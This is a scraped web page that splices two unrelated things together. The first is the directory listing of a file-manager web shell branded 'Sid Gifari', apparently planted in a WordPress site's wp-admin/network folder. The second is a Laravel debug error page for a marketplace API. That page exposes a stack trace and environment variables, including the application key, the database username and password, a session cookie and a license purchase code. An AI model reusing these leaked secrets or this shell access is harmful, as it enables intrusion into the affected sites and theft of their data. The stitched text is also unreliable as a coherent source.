Sid Gifari File Manager

🏠 Root / home2 / meumer25 / netodolele.com.br / wp-admin / network /
root@Sid-Gifari:/home2/meumer25/netodolele.com.br/wp-admin/network$


NameSizePermAction
πŸ“„ .htaccess 127 bytes
πŸ“„ 51.php 10944 bytes
πŸ“„ about.php 245 bytes
πŸ“„ admin.php 1024 bytes
πŸ“„ contribute.php 255 bytes
πŸ“„ credits.php 249 bytes
πŸ“„ edit.php 908 bytes
πŸ“„ freedoms.php 251 bytes
πŸ“„ index.php 2911 bytes
πŸ“„ menu.php 4798 bytes
πŸ“ network -
πŸ“„ plugin-editor.php 266 bytes
πŸ“„ plugin-install.php 377 bytes
πŸ“„ plugins.php 249 bytes
πŸ“„ privacy.php 249 bytes
πŸ“„ profile.php 254 bytes
πŸ“„ settings.php 22027 bytes
πŸ“„ setup.php 247 bytes
πŸ“„ site-info.php 7777 bytes
πŸ“„ site-new.php 9601 bytes
πŸ“„ site-settings.php 5599 bytes
πŸ“„ site-themes.php 6875 bytes
πŸ“„ site-users.php 11802 bytes
πŸ“„ sites.php 14536 bytes
πŸ“„ theme-editor.php 264 bytes
πŸ“„ theme-install.php 374 bytes
πŸ“„ themes.php 15989 bytes
πŸ“„ update-core.php 253 bytes
πŸ“„ update.php 450 bytes
πŸ“„ upgrade.php 4944 bytes
πŸ“„ user-edit.php 253 bytes
πŸ“„ user-new.php 5228 bytes
πŸ“„ users.php 9494 bytes
ο»ΏBiaoJiOk Whoops! There was an error.
Symfony \ Component \ ErrorHandler \ Error \ FatalError
During inheritance of ArrayAccess: Uncaught ErrorException: Return type of Illuminate\Support\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php:1349 Stack trace: #0 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php(11): Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(8192, 'Return type of ...', '/home2/meumer25...', 1349) #1 /home2/meumer25/api.meumercado.app/vendor/composer/ClassLoader.php(571): include('/home2/meumer25...') #2 /home2/meumer25/api.meumercado.app/vendor/composer/ClassLoader.php(428): Composer\Autoload\includeFile('/home2/meumer25...') #3 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/helpers.php(110): Composer\Autoload\ClassLoader->loadClass('Illuminate\\Supp...') #4 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php(89): collect(Array) #5 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php(78): Illuminate\Foundation\PackageManifest->config('aliases') #6 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/RegisterFacades.php(26): Illuminate\Foundation\PackageManifest->aliases() #7 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(230): Illuminate\Foundation\Bootstrap\RegisterFacades->bootstrap(Object(Illuminate\Foundation\Application)) #8 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(151): Illuminate\Foundation\Application->bootstrapWith(Array) #9 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(135): Illuminate\Foundation\Http\Kernel->bootstrap() #10 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(109): Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(Object(Illuminate\Http\Request)) #11 /home2/meumer25/api.meumercado.app/index.php(62): Illuminate\Foundation\Http\Kernel->handle(Object(Illuminate\Http\Request)) #12 {main} Symfony\Component\ErrorHandler\Error\FatalError thrown with message "During inheritance of ArrayAccess: Uncaught ErrorException: Return type of Illuminate\Support\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php:1349 Stack trace: #0 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php(11): Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(8192, 'Return type of ...', '/home2/meumer25...', 1349) #1 /home2/meumer25/api.meumercado.app/vendor/composer/ClassLoader.php(571): include('/home2/meumer25...') #2 /home2/meumer25/api.meumercado.app/vendor/composer/ClassLoader.php(428): Composer\Autoload\includeFile('/home2/meumer25...') #3 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/helpers.php(110): Composer\Autoload\ClassLoader->loadClass('Illuminate\\Supp...') #4 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php(89): collect(Array) #5 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php(78): Illuminate\Foundation\PackageManifest->config('aliases') #6 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/RegisterFacades.php(26): Illuminate\Foundation\PackageManifest->aliases() #7 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(230): Illuminate\Foundation\Bootstrap\RegisterFacades->bootstrap(Object(Illuminate\Foundation\Application)) #8 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(151): Illuminate\Foundation\Application->bootstrapWith(Array) #9 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(135): Illuminate\Foundation\Http\Kernel->bootstrap() #10 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(109): Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(Object(Illuminate\Http\Request)) #11 /home2/meumer25/api.meumercado.app/index.php(62): Illuminate\Foundation\Http\Kernel->handle(Object(Illuminate\Http\Request)) #12 {main}" Stacktrace: #0 Symfony\Component\ErrorHandler\Error\FatalError in /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php:11
0
Symfony\Component\ErrorHandler\Error\FatalError
/vendor/laravel/framework/src/Illuminate/Support/Collection.php11
/home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php
<?php
 
namespace Illuminate\Support;
 
use ArrayAccess;
use ArrayIterator;
use Illuminate\Support\Traits\EnumeratesValues;
use Illuminate\Support\Traits\Macroable;
use stdClass;
 
class Collection implements ArrayAccess, Enumerable
{
    use EnumeratesValues, Macroable;
 
    /**
     * The items contained in the collection.
     *
     * @var array
     */
    protected $items = [];
 
    /**
     * Create a new collection.
     *
     * @param  mixed  $items
     * @return void
     */
    public function __construct($items = [])
    {
        $this->items = $this->getArrayableItems($items);
    }
 
    /**
     * Create a new collection by invoking the callback a given amount of times.
     *
     * @param  int  $number
     * @param  callable|null  $callback
     * @return static
     */
    public static function times($number, callable $callback = null)
Arguments
  1. """
    During inheritance of ArrayAccess: Uncaught ErrorException: Return type of Illuminate\Support\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php:1349\n
    Stack trace:\n
    #0 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/Collection.php(11): Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(8192, 'Return type of ...', '/home2/meumer25...', 1349)\n
    #1 /home2/meumer25/api.meumercado.app/vendor/composer/ClassLoader.php(571): include('/home2/meumer25...')\n
    #2 /home2/meumer25/api.meumercado.app/vendor/composer/ClassLoader.php(428): Composer\Autoload\includeFile('/home2/meumer25...')\n
    #3 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Support/helpers.php(110): Composer\Autoload\ClassLoader->loadClass('Illuminate\\Supp...')\n
    #4 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php(89): collect(Array)\n
    #5 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/PackageManifest.php(78): Illuminate\Foundation\PackageManifest->config('aliases')\n
    #6 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/RegisterFacades.php(26): Illuminate\Foundation\PackageManifest->aliases()\n
    #7 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(230): Illuminate\Foundation\Bootstrap\RegisterFacades->bootstrap(Object(Illuminate\Foundation\Application))\n
    #8 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(151): Illuminate\Foundation\Application->bootstrapWith(Array)\n
    #9 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(135): Illuminate\Foundation\Http\Kernel->bootstrap()\n
    #10 /home2/meumer25/api.meumercado.app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(109): Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(Object(Illuminate\Http\Request))\n
    #11 /home2/meumer25/api.meumercado.app/index.php(62): Illuminate\Foundation\Http\Kernel->handle(Object(Illuminate\Http\Request))\n
    #12 {main}
    """
    

Environment & details:

Key Value
p
"Ahome2Ameumer25AnetodoleleIcomIbrAwp-adminAnetwork"
empty
empty
Key Value
PHPSESSID
"ec60d3f6441b942ca1eb6c9cb249da81"
empty
Key Value
LSPHP_ENABLE_USER_INI
"on"
PATH
"/usr/local/bin:/usr/bin:/bin"
TEMP
"/tmp"
TMP
"/tmp"
TMPDIR
"/tmp"
PWD
"/"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, br, zstd, deflate"
CONTENT_LENGTH
"0"
HTTP_COOKIE
"PHPSESSID=ec60d3f6441b942ca1eb6c9cb249da81"
HTTP_HOST
"api.meumercado.app"
HTTP_USER_AGENT
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
REDIRECT_UNIQUE_ID
"aezOSv-UNoNaJA4k2_bpzwAB9H0"
REDIRECT_QS_ConnectionId
"177712698684455125721478"
REDIRECT_HTTPS
"on"
REDIRECT_SSL_TLS_SNI
"api.meumercado.app"
REDIRECT_HTTP2
"on"
REDIRECT_H2PUSH
"off"
REDIRECT_H2_PUSH
"off"
REDIRECT_H2_PUSHED
""
REDIRECT_H2_PUSHED_ON
""
REDIRECT_H2_STREAM_ID
"9"
REDIRECT_H2_STREAM_TAG
"721478-996-9"
REDIRECT_STATUS
"200"
UNIQUE_ID
"aezOSv-UNoNaJA4k2_bpzwAB9H0"
QS_ConnectionId
"177712698684455125721478"
HTTPS
"on"
SSL_TLS_SNI
"api.meumercado.app"
HTTP2
"on"
H2PUSH
"off"
H2_PUSH
"off"
H2_PUSHED
""
H2_PUSHED_ON
""
H2_STREAM_ID
"9"
H2_STREAM_TAG
"721478-996-9"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SERVER_NAME
"api.meumercado.app"
SERVER_ADDR
"10.53.184.85"
SERVER_PORT
"443"
REMOTE_ADDR
"216.73.217.46"
DOCUMENT_ROOT
"/home2/meumer25/api.meumercado.app"
REQUEST_SCHEME
"https"
CONTEXT_PREFIX
""
CONTEXT_DOCUMENT_ROOT
"/home2/meumer25/api.meumercado.app"
SERVER_ADMIN
"webmaster@api.meumercado.app"
SCRIPT_FILENAME
"/home2/meumer25/api.meumercado.app/index.php"
REMOTE_PORT
"33249"
REDIRECT_URL
"/theme-rtl.css"
REDIRECT_QUERY_STRING
"p=Ahome2Ameumer25AnetodoleleIcomIbrAwp-adminAnetwork"
SERVER_PROTOCOL
"HTTP/2.0"
REQUEST_METHOD
"GET"
QUERY_STRING
"p=Ahome2Ameumer25AnetodoleleIcomIbrAwp-adminAnetwork"
REQUEST_URI
"/theme-rtl.css?p=Ahome2Ameumer25AnetodoleleIcomIbrAwp-adminAnetwork"
SCRIPT_NAME
"/index.php"
PHP_SELF
"/index.php"
REQUEST_TIME_FLOAT
1777126987.8883
REQUEST_TIME
1777126987
argv
array:1 [
  0 => "p=Ahome2Ameumer25AnetodoleleIcomIbrAwp-adminAnetwork"
]
argc
1
APP_NAME
"MeuMercado.app"
APP_ENV
"local"
APP_KEY
"base64:xTzwnQphOUOM5lHprJbqkV4YLi9TZhu61jvPnULHSF0="
APP_DEBUG
"true"
APP_INSTALL
"true"
APP_LOG_LEVEL
"debug"
APP_MODE
"live"
APP_URL
"https://api.meumercado.app"
DB_CONNECTION
"mysql"
DB_HOST
"localhost"
DB_PORT
"3306"
DB_DATABASE
"meumer25_meumercado"
DB_USERNAME
"meumer25_admin"
DB_PASSWORD
"xuf7upuw"
BROADCAST_DRIVER
"log"
CACHE_DRIVER
"file"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
QUEUE_DRIVER
"sync"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
PURCHASE_CODE
"da5d616e-83a2-494e-add1-9347df6c0351"
BUYER_USERNAME
"sergiokkawanami"
SOFTWARE_ID
"MzExNTc0NTQ="
SOFTWARE_VERSION
"6.0"
Key Value
APP_NAME
"MeuMercado.app"
APP_ENV
"local"
APP_KEY
"base64:xTzwnQphOUOM5lHprJbqkV4YLi9TZhu61jvPnULHSF0="
APP_DEBUG
"true"
APP_INSTALL
"true"
APP_LOG_LEVEL
"debug"
APP_MODE
"live"
APP_URL
"https://api.meumercado.app"
DB_CONNECTION
"mysql"
DB_HOST
"localhost"
DB_PORT
"3306"
DB_DATABASE
"meumer25_meumercado"
DB_USERNAME
"meumer25_admin"
DB_PASSWORD
"xuf7upuw"
BROADCAST_DRIVER
"log"
CACHE_DRIVER
"file"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
QUEUE_DRIVER
"sync"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
PURCHASE_CODE
"da5d616e-83a2-494e-add1-9347df6c0351"
BUYER_USERNAME
"sergiokkawanami"
SOFTWARE_ID
"MzExNTc0NTQ="
SOFTWARE_VERSION
"6.0"
0. Whoops\Handler\PrettyPageHandler